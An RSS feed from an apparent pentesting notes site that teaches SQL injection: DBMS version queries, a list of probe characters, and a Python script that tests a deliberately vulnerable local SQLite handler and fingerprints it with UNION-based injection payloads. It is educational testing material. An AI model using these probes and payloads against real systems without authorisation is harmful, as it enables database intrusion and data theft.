<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>SQL Injection on LEIKAH</title><link>https://leikah.haoyingcao.xyz/en/categories/sql-injection/</link><description>Recent content in SQL Injection on LEIKAH</description><generator>Hugo</generator><language>en</language><atom:link href="https://leikah.haoyingcao.xyz/en/categories/sql-injection/index.xml" rel="self" type="application/rss+xml"/><item><title>Database Enumeration</title><link>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/db_enum/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/db_enum/</guid><description>&lt;p&gt;Database enumeration and dumping is the stage of SQL injection testing that follows once the vulnerability has been confirmed. With control over the query, we can extract schema details, sensitive records, user credentials, and much more.&lt;/p&gt;
&lt;h2 id="database-identification"&gt;Database Identification&lt;a class="td-heading-self-link" href="#database-identification" aria-label="Heading self-link"&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The first step is to identify the type and version of the &lt;strong&gt;Database Management System (DBMS)&lt;/strong&gt; we are interacting with, since the syntax of every later enumeration query depends on it. The version query itself already differs between dialects:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MySQL&lt;/strong&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;SELECT&lt;/span&gt; &lt;span style="color:#81a1c1"&gt;@@&lt;/span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;version&lt;/span&gt;&lt;span style="color:#eceff4"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;MSSQL&lt;/strong&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;SELECT&lt;/span&gt; &lt;span style="color:#81a1c1"&gt;@@&lt;/span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;version&lt;/span&gt;&lt;span style="color:#eceff4"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;SELECT&lt;/span&gt; &lt;span style="color:#81a1c1;font-weight:bold"&gt;version&lt;/span&gt;&lt;span style="color:#eceff4"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="database-user"&gt;Database User&lt;a class="td-heading-self-link" href="#database-user" aria-label="Heading self-link"&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;It may also be beneficial to enumerate the user the web application authenticates to the database as, since that account's privileges bound what the injection can read, write, or execute.&lt;/p&gt;</description></item><item><title>SQL Injection</title><link>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/</guid><description>&lt;p&gt;Web applications often interact with SQL databases to &lt;strong&gt;Create, Read, Update, and Delete (CRUD)&lt;/strong&gt; data through SQL queries. &lt;strong&gt;SQL injection&lt;/strong&gt; occurs when a malicious user supplies input that changes the SQL query the web application sends to the database. First, the attacker has to place code outside the boundary reserved for user input, so that the database does not treat it as data. This is usually accomplished with a single or double quote that terminates the string literal the input was placed in; everything after it is then parsed as SQL.&lt;/p&gt;</description></item><item><title>SQLi Manual Testing Methodology</title><link>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/manual_exploit/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/manual_exploit/</guid><description>&lt;h2 id="discover-injection-points"&gt;Discover Injection Points&lt;a class="td-heading-self-link" href="#discover-injection-points" aria-label="Heading self-link"&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The first step in the methodology for testing SQL injection is to identify injection points, that is, places where user-controlled input is passed into a SQL query. These can be:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;HTTP GET/POST Parameters&lt;/li&gt;
&lt;li&gt;User-Agent strings&lt;/li&gt;
&lt;li&gt;Cookies&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can insert each of the following SQL special characters into the parameter and check whether the back-end responds differently from the original request:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;`&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;))&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;\&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
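&lt;p&gt;The probing procedure above, together with the version queries from the Database Enumeration page, as an added runnable example that is not part of the original page: a constructed, deliberately vulnerable handler backed by an in-memory SQLite database (SQLite is used only so the demo runs offline; the page itself covers MySQL, MSSQL and PostgreSQL), the six probe characters sent against a string-quoted and a numeric parameter with a control value to filter out ordinary no-match responses, and a fingerprinting step that UNIONs each dialect's version function onto the original query. The function names, the products table and the response format are assumptions of this example.&lt;/p&gt;

```python
import sqlite3


# Constructed sample back-end: stands in for the application's real database.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "apple", 1.5), (2, "pear", 2.0)])
    return conn


def vulnerable_endpoint(conn, template):
    """Constructed, deliberately vulnerable handler: the raw input is spliced into
    `template` at the {} marker by string formatting, exactly the bug SQLi exploits.
    Returns a minimal HTTP-like response dict (status, body)."""
    def send(user_input):
        sql = template.format(user_input)
        try:
            rows = conn.execute(sql).fetchall()
            return {"status": 200, "body": repr(rows)}
        except sqlite3.Error as exc:
            # Verbose error page, as an unhardened application often returns
            return {"status": 500, "body": "Database error: " + str(exc)}
    return send


# The probe characters from the methodology above
PROBES = ["'", '"', "`", ")", "))", "\\"]


def probe_parameter(send, benign_value, nonmatching_value):
    """Append each probe to a benign value and classify the response:
    'error'     - the server failed, so the character reached the SQL parser
    'different' - a 200 whose body matches neither the benign nor the control lookup
    'same'      - indistinguishable from an ordinary (matching or non-matching) lookup
    The control request rules out differences caused merely by a value that matches nothing."""
    baseline = send(benign_value)
    control = send(nonmatching_value)
    verdicts = {}
    for probe in PROBES:
        resp = send(benign_value + probe)
        if resp["status"] != 200:
            verdicts[probe] = "error"
        elif resp["body"] != baseline["body"] and resp["body"] != control["body"]:
            verdicts[probe] = "different"
        else:
            verdicts[probe] = "same"
    return verdicts


# Version functions per dialect (MySQL, MSSQL, PostgreSQL as on the page; SQLite added
# so the offline demo has a dialect that answers). MySQL and MSSQL share @@version, so
# the returned version string itself has to separate them.
VERSION_QUERIES = [
    ("@@version", "MySQL or MSSQL"),
    ("version()", "PostgreSQL"),
    ("sqlite_version()", "SQLite"),
]


def fingerprint_dbms(send, columns):
    """Through a string-context injection, UNION each dialect's version function onto the
    original query; the first one the parser accepts identifies the DBMS.
    `columns` is the original query's column count, which has to be established first."""
    pad = ", NULL" * (columns - 1)
    for version_fn, dbms in VERSION_QUERIES:
        resp = send("' UNION SELECT " + version_fn + pad + " -- ")
        if resp["status"] == 200 and resp["body"] != "[]":
            return dbms, resp["body"]
    return None, None


def demo():
    conn = make_db()
    string_ctx = vulnerable_endpoint(conn, "SELECT name, price FROM products WHERE name = '{}'")
    numeric_ctx = vulnerable_endpoint(conn, "SELECT name, price FROM products WHERE id = {}")
    dbms, evidence = fingerprint_dbms(string_ctx, columns=2)
    return {
        "string": probe_parameter(string_ctx, "apple", "mango"),
        "numeric": probe_parameter(numeric_ctx, "1", "99"),
        "dbms": dbms,
        "evidence": evidence,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

&lt;p&gt;Against the SQLite stand-in only the single quote breaks the string-quoted parameter, while every probe breaks the unquoted numeric one; that difference is what tells you which context the input lands in. Against a real target the send callable would wrap an HTTP request and compare status, length and error strings the same way. Since @@version alone cannot separate MySQL from MSSQL, read the returned version string to decide.&lt;/p&gt;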
&lt;p&gt;If we see error messages or different page responses, these characters are being interpreted as part of the SQL statement, which points to a viable injection point. Compare against a harmless control value as well, since a search term that simply matches nothing also changes the page; a database error, or a change that the control does not reproduce, is the stronger signal.&lt;/p&gt;</description></item></channel></rss>